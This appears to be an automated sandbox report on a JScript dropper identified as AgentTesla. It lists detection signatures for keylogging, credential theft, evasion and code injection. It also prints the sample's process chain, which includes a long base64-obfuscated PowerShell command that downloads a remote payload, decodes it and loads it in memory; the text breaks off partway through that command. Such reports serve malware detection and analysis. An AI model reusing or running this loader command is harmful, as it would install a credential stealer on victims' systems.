Edit tour
Windows
Analysis Report
scan_374783.js
Overview
General Information
Detection
AgentTesla
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Command shell drops VBS files
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 5368 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\scan_ 374783.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 6688 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KAAoACcAQg AnACsAJwAw ADgAdQByAG wAIAA9ACAA QwAnACsAJw A3AEkAaAB0 AHQAcABzAD oALwAvAHIA YQAnACsAJw B3AC4AJwAr ACcAZwBpAC cAKwAnAHQA aAB1ACcAKw AnAGIAdQAn ACsAJwBzAG UAcgBjAG8A bgB0ACcAKw AnAGUAbgB0 ACcAKwAnAC 4AYwAnACsA JwBvAG0ALw BOACcAKwAn AG8ARABlAH QAZQBjAHQA TwAnACsAJw BuAC8ATgBv AEQAZQAnAC sAJwB0AGUA YwB0AE8Abg AvAHIAZQBm AHMAJwArAC cALwBoACcA KwAnAGUAYQ AnACsAJwBk ACcAKwAnAH MAJwArACcA LwAnACsAJw BtACcAKwAn AGEAaQBuAC 8ARABlACcA KwAnAHQAYQ BoAE4AbwAn ACsAJwB0AG gALQBWACcA KwAnAC4AdA AnACsAJwB4 AHQAQwAnAC sAJwA3AEkA OwAgAEIAMA AnACsAJwA4 AGIAYQBzAC cAKwAnAGUA NgA0AEMAJw ArACcAbwAn ACsAJwBuAH QAZQBuAHQA IAA9ACAAKA BOAGUAdwAt AE8AYgBqAC cAKwAnAGUA YwAnACsAJw B0ACAAUwB5 AHMAdABlAG 0ALgBOAGUA dAAuAFcAZQ AnACsAJwBi AEMAbABpAG UAbgB0ACkA LgBEACcAKw AnAG8AdwBu AGwAbwAnAC sAJwBhAGQA JwArACcAUw B0AHIAJwAr ACcAaQAnAC sAJwBuAGcA KABCACcAKw AnADAAOAB1 ACcAKwAnAH IAbAAnACsA JwApADsAIA BCADAAJwAr ACcAOAAnAC sAJwBiAGkA bgBhACcAKw AnAHIAJwAr ACcAeQAnAC sAJwBDACcA KwAnAG8Abg B0ACcAKwAn AGUAbgB0AC AAPQAnACsA JwAgAFsAUw B5AHMAdAAn ACsAJwBlAG 0ALgBDAG8A bgB2AGUAJw ArACcAcgB0 AF0AOgA6AC cAKwAnAEYA cgAnACsAJw BvAG0AQgBh AHMAZQA2AD QAUwB0AHIA aQBuACcAKw AnAGcAKAAn ACsAJwBCAD AAJwArACcA OABiAGEAJw ArACcAcwBl ADYANAAnAC sAJwBDAG8A bgB0ACcAKw AnAGUAbgB0 ACkAOwAgAC cAKwAnAEIA MAA4AGEAcw BzAGUAbQBi AGwAeQAgAC cAKwAnAD0A IABbAFIAZQ BmAGwAJwAr ACcAZQBjAC cAKwAnAHQA JwArACcAaQ BvAG4ALgBB AHMAcwBlAG 0AYgBsAHkA XQA6ADoATA AnACsAJwBv AGEAZAAoAE IAMAA4ACcA KwAnAGIAaQ BuAGEAcgB5 AEMAJwArAC cAbwAnACsA JwBuAHQAZQ BuACcAKwAn AHQAKQAnAC sAJwA7ACAA WwBkAG4AbA BpAGIAJwAr ACcALgBJAC cAKwAnAE8A LgBIACcAKw AnAG8AbQAn ACsAJwBlAC cAKwAnAF0A OgA6AFYAQQ AnACsAJwBJ ACgAJwArAC cAcABRACcA KwAnAFUAOA A4ADQAZQAn ACsAJwA4AG UAMABkADUA MgAnACsAJw BmADAALQAn ACsAJwBlAD UAYQAnACsA JwBiAC0AJw ArACcAMQAn ACsAJwAxAD YANAAtADAA MABjADYAJw ArACcALQBh AGEAYQAyAG YAZgA1AGUA JwArACcAPQ AnACsAJwBu ACcAKwAnAG UAJwArACcA awAnACsAJw BvAHQAJgBh AGkAZABlAG 0APQB0AGwA YQA/AHQAeA AnACsAJwB0 ACcAKwAnAC 4ANAAyADAA MgAwADEANw AwAG4AaQBn ACcAKwAnAG kAcgBvAHIA ZQAnACsAJw BpAHYAYQB4 AC8AbwAvAG 0AbwAnACsA JwBjAC4AJw ArACcAdABv AHAAcwBwAH AAYQAuADQA MgAwADIAcw AnACsAJwB0 AHAAeQByAC cAKwAnAGMA JwArACcALw BiAC8AMAB2 ACcAKwAnAC 8AbQBvAGMA JwArACcALg AnACsAJwBz AGkAcABhAG UAbABnACcA KwAnAG8Abw BnACcAKwAn AC4AZQAnAC sAJwBnAGEA cgBvACcAKw AnAHQAJwAr ACcAcwBlAH MAYQBiACcA KwAnAGUAcg BpAGYAJwAr ACcALwAvAD oAJwArACcA cwAnACsAJw BwAHQAJwAr ACcAdABoAH AAUQBVACwA JwArACcAIA BwAFEAVQAx AHAAUQBVAC wAJwArACcA IABwAFEAVQ BDADoAVAAn ACsAJwA0AH kAUAByAG8A ZwByAGEAbQ BEAGEAdABh ACcAKwAnAF QANAAnACsA JwB5ACcAKw AnAHAAUQBV ACwAIABwAC cAKwAnAFEA VQBhACcAKw AnAGwAYwBh AHQAaQAnAC